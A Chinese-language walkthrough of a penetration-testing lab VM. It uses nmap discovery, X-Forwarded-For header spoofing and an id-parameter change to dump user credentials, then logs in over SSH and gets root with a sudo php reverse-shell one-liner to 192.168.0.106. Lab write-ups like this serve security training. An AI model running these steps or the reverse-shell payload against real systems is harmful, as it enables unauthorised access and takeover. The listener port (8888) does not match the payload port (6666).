设置靶机和kali两个网卡都为NAT模式
nmap 192.168.25.0/24
nmap 192.168.25.160
访问网站扫描出来的端口
访问主页,右击查看源代码发现让我们使用x-forwarded-for,这时我们想起了抓包
我们发现每换一次页面都需要添加x-forwarded-for:127.0.0.1
点击Register按钮时抓包,并填写下面资料
提交时同样抓包进行更改x-forwarded-for:127.0.0.1,并拿我们注册的账号密码登陆
来到这个页面我们发现URL中有id值
并尝试将id值改为1并查看profile,就会发现管理员的账号和密码(密码隐藏我们暂时看不到)
查看密码的方法有两种
第一种,F12检查页面将密码的type内容password,改为text
第二种,使用burp抓页面的包并查看密码
得知
id=1用户,账号:eweuhtandingan 密码:skuyatuh
id=2用户,账号:aingmaung 密码:qwerty!!!
id=3用户,账号:sundatea 密码:indONEsia
id=4用户,账号:indONEsia 密码:cedihhihihi
id=5用户,账号:alice 密码:4lic3
id=6用户,账号:abdikasepak 密码:dorrrrr
扫描端口时,我们看见SSH端口打开,我们使用终端尝试使用上面获得的账号密码连接,使用id=5的用户密码成功连接上
ssh alice@192.168.25.160
登陆上查看flag
ls -la
cd .my_secret
cat flag1.txt
反弹shell
使用sudo -l查看当前sudo权限
使用Linux进行监听
nc -lvnp 8888
配合sudo执行php拿到权限
sudo php -r '$sock=fsockopen("192.168.0.106",6666);exec("/bin/bash -i <&3 >&3 2>
&3");'
我们进入root权限查看flag2
cd /root
ls -la
cat flag2.txt